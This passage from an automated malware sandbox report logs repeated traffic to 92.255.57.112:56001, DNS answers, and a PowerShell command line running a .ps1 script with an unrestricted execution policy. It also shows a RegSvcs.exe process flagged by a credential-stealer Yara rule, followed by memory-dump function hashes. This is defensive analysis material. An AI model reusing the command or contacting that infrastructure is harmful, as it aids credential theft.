Jan 15, 2025 08:25:45.430104017 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:45.435105085 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:45.435337067 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:45.440217972 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:45.812197924 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:45.871403933 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:45.980798006 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:45.984282970 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:45.989084005 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:45.989501953 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:45.994323969 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:55.949938059 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:55.954871893 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:55.954926014 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:55.959685087 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:56.326054096 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:56.374113083 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:56.496591091 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:56.503519058 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:56.508379936 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:25:56.508444071 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:25:56.513202906 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:11.934547901 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:11.939591885 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:11.939654112 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:11.944466114 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:12.323365927 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:12.403600931 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:12.496845007 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:12.505426884 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:12.510292053 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:12.511588097 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:12.516415119 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:23.997742891 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:24.002605915 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:24.006206989 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:24.011042118 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:24.375226021 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:24.430529118 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:24.543785095 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:24.546221018 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:24.551058054 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:24.551114082 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:24.555891037 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:29.981367111 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:29.986368895 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:29.989751101 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:29.994566917 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:30.359194040 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:30.436201096 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:30.528527975 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:30.531145096 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:30.536712885 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:30.536765099 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:30.541591883 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:30.590851068 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:30.595779896 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:30.595834970 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:30.600620985 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:30.930737019 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:31.025568008 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:31.090969086 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:31.093179941 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:31.097960949 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:31.098018885 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:31.103473902 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:34.465743065 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:34.470556974 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:34.470606089 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:34.475411892 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:34.842719078 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:34.887135983 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:35.018105984 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:35.020226955 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:35.025039911 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:35.025088072 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:35.029825926 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:52.935889006 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:52.941215038 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:52.941354036 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:52.946212053 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:53.316782951 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:53.371488094 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:53.482150078 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:53.487596989 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:53.492448092 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:26:53.495640039 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:26:53.500502110 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:00.171705961 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:00.176772118 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:00.179681063 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:00.184577942 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:00.552278042 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:00.605953932 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:00.716344118 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:00.718350887 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:00.723242998 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:00.723304033 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:00.728064060 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:05.731403112 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:05.736318111 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:05.736603975 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:05.741460085 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:06.106641054 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:06.155958891 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:06.279098988 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:06.282434940 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:06.287290096 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:06.287467003 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:06.292397976 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:07.513071060 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:07.517971992 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:07.518057108 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:07.522811890 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:07.893019915 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:07.934088945 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:08.060504913 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:08.063724041 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:08.068542957 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:08.068800926 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:08.073651075 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:28.903644085 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:28.909611940 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:28.909830093 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:28.915467978 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:29.281933069 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:29.327126026 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:29.446405888 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:29.451731920 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:29.456512928 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:29.458630085 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:29.463419914 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:48.263005018 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:48.268019915 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:48.268126965 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:48.272881031 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:48.652544975 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:48.699677944 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:48.826735020 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:48.830898046 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:48.835762024 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:48.835823059 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:48.840728045 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:49.075267076 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:49.080257893 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:49.080338001 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:49.085131884 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:49.387089014 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:49.438663960 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:49.561317921 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:49.568244934 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:49.573065042 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:27:49.573152065 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:27:49.578011036 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:28:05.231355906 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:28:05.236314058 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:28:05.236398935 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:28:05.241677046 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:28:05.607952118 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:28:05.652873039 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:28:05.780394077 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:28:05.783092022 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:28:05.788007021 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:28:05.788343906 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:28:05.793385983 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:28:11.483860016 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:28:11.488652945 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:28:11.491837978 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:28:11.496609926 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:28:11.867855072 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:28:11.918597937 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:28:12.030651093 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:28:12.035283089 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:28:12.040193081 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:28:12.040380955 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:28:12.045303106 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:28:16.107475042 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:28:16.112385988 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:28:16.112577915 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:28:16.117461920 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:28:16.483745098 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:28:16.527812004 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:28:16.655467987 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:28:16.656429052 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:28:16.661298037 CET	56001	49706	92.255.57.112	192.168.2.5
Jan 15, 2025 08:28:16.661381006 CET	49706	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 08:28:16.666178942 CET	56001	49706	92.255.57.112	192.168.2.5

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 15, 2025 08:24:16.631928921 CET	1.1.1.1	192.168.2.5	0x25f6	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:24:16.631928921 CET	1.1.1.1	192.168.2.5	0x25f6	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:24:24.962032080 CET	1.1.1.1	192.168.2.5	0xb553	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 15, 2025 08:24:24.962032080 CET	1.1.1.1	192.168.2.5	0xb553	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	02:24:06
Start date:	15/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:24:06
Start date:	15/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:24:08
Start date:	15/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x940000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4558584705.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Function 00007FF849000F9C Relevance: 2.0, Instructions: 2003COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149645297.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6e3e8a1af4f629959de5029f83c37c35d1828e22c9b7a7061f6e1c0bd548e69
Instruction ID: 872960f25bedaf6ead75c19ad7be84fc4c554038ac9931936d0341924587337d
Opcode Fuzzy Hash: d6e3e8a1af4f629959de5029f83c37c35d1828e22c9b7a7061f6e1c0bd548e69
Instruction Fuzzy Hash: 18C20931E1EBC94FEBA6AF2868559B57BE1EF56250B0801FBD04DC7193EA18DC06C352

Function 00007FF848F3444D Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

L, xrefs: 00007FF848F3447C

Memory Dump Source

Source File: 00000000.00000002.2149224008.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: 4f67942d067e2c6343930a6a0f7d92a17e2c6f3d67eded59e405bb55b5559a17
Instruction ID: 9703cd4e43046c6b0f67b636df997d8948c3fcd6156a21b53f6c79f5b61687a7
Opcode Fuzzy Hash: 4f67942d067e2c6343930a6a0f7d92a17e2c6f3d67eded59e405bb55b5559a17
Instruction Fuzzy Hash: CA41F932A1E6929FE3527B7CA8550F97B60EF423A8B184273C088CF1D7DA2C9455C399

Function 00007FF848F3AEF2 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149224008.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb620b8607e175fa749c06b65db6cc1ebf3f660fc434dfd0b06cf939885f8b3
Instruction ID: 69bf1f3d1e1b4fb1cb62b03fa869e768e37b84854cab57d299956d64b9fb1473
Opcode Fuzzy Hash: aeb620b8607e175fa749c06b65db6cc1ebf3f660fc434dfd0b06cf939885f8b3
Instruction Fuzzy Hash: B151E932A1E5655FD341FBACA8951EE73A0EF512ADF084277D14CCB283EF1C5446429A

Function 00007FF8490013E0 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149645297.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56683276a412b60ef5360ed4ff624ae545f31cadaae88f69168986dd61522458
Instruction ID: 7a36e90acb9e740fc31dcacef0fd4ee49c8038f748ce7e6da83aab106a6ec0e7
Opcode Fuzzy Hash: 56683276a412b60ef5360ed4ff624ae545f31cadaae88f69168986dd61522458
Instruction Fuzzy Hash: 5541C131E1DA8A8FEBE9EE2C6094A7466D1FF94391B5801FAD40DC71D2EE29DC448380

Function 00007FF848F3B025 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149224008.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 736d5e3d43bf24fe37636a3fa5e9c6cd3c8c9eeea45ab7d72d531dd45842b7ea
Instruction ID: 3ad04d7cb5e39004564fe935962a50136f0b05ec233d2ec8a3a134f08939b998
Opcode Fuzzy Hash: 736d5e3d43bf24fe37636a3fa5e9c6cd3c8c9eeea45ab7d72d531dd45842b7ea
Instruction Fuzzy Hash: 53411672F2DA8A4FE359BB3C186A1B47BD1EF99290F0401BBC409C72D7DE1CA8458395

Function 00007FF848F3B126 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149224008.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2256eebea266e01c75ad92d84848594d3958e79fb18f0f225c28cb97cafe2c08
Instruction ID: a838de5d0c57e19130c5c005b55cb3a219ccf47cec5fecb82a4431d31636cc29
Opcode Fuzzy Hash: 2256eebea266e01c75ad92d84848594d3958e79fb18f0f225c28cb97cafe2c08
Instruction Fuzzy Hash: 7111D631F2C90B5FE359BB3C08651796182AFD8791F5482BBC40AC73D7DE58A8854289

Function 00007FF848F3D1FF Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149224008.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad6ec113deb1755279012c20b34ce8c269259b7da8b1cfa3a91ee3cc19574fe8
Instruction ID: 4b07608269903f9d861bce256c4c9b091a3e8180442ae938c5dc081957e76711
Opcode Fuzzy Hash: ad6ec113deb1755279012c20b34ce8c269259b7da8b1cfa3a91ee3cc19574fe8
Instruction Fuzzy Hash: 2C110A32F1C8474FE359B72C44552B9A682DBE5391F0442BBC409C72D7EE2C99454789

Function 00007FF848F337B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149224008.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: deb923fabd2837f2379e5f9e01aad23e341a67bf454069198374004b12345de3
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 4601677111CB0D4FD744EF0CE451AA6B7E0FB95364F10056EE58AC3695D736E882CB45

Function 00007FF848F348D1 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149224008.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d46f4f4e515f5dd19c659b2c8a09c6290ddf029f5e8c173ad80eea47dbb7c973
Instruction ID: 816649384b9709ca033e816a5dede6011256cd4b2b7e3e5a2668cb31762997f9
Opcode Fuzzy Hash: d46f4f4e515f5dd19c659b2c8a09c6290ddf029f5e8c173ad80eea47dbb7c973
Instruction Fuzzy Hash: 38F0B774D1860FCFDB00EFA4C4815AEF7B0EB54351F244926D515E6294EB38AA448F94

Function 00007FF848F35395 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149224008.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7165f450b9657fa851df955cffe2a6a6c907a3988a3460fffcf8f3eef2bc806d
Instruction ID: 8acf669cd678c2699e878dda858090afe76002f7083662257330173131b74e64
Opcode Fuzzy Hash: 7165f450b9657fa851df955cffe2a6a6c907a3988a3460fffcf8f3eef2bc806d
Instruction Fuzzy Hash: 73E0DF31A1C3821FE70CFB78049213AA5E1AF56280F1050BED98EC32C3CE6C68094B15

Function 00007FF848F3859F Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149224008.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1d48d1ff8d7082587831e7a406b34eb3c1619b8831c351a242c584725f089d2
Instruction ID: 6466d538969498d96a94269e7d9bd7979964638c36eeb4a493e5925705a63ff7
Opcode Fuzzy Hash: e1d48d1ff8d7082587831e7a406b34eb3c1619b8831c351a242c584725f089d2
Instruction Fuzzy Hash: 6DC0803151C111CFD12D663440110357166FB49145B71507FD587975D2CF3D7C018749

Function 00007FF848F3D2A2 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149224008.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f13618831e6dbfb17c68dcf7d7787bcbbc4a788cd0ab59c0a55926c87f169f8
Instruction ID: 95dfac4e01639ec2659d958e67b0b5546e362af4dd6cbd7372133485805df7b9
Opcode Fuzzy Hash: 8f13618831e6dbfb17c68dcf7d7787bcbbc4a788cd0ab59c0a55926c87f169f8
Instruction Fuzzy Hash: D4A0112A80C002CBF022B328802003C00038B802A8F280033820AAA2C2CE28A808028A

Non-executed Functions

Function 00007FF848F361B9 Relevance: .9, Instructions: 858COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149224008.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3fa31d2c575c3bdf6de30c50f69e8f2a252abef286fa7526dbff3de8282735
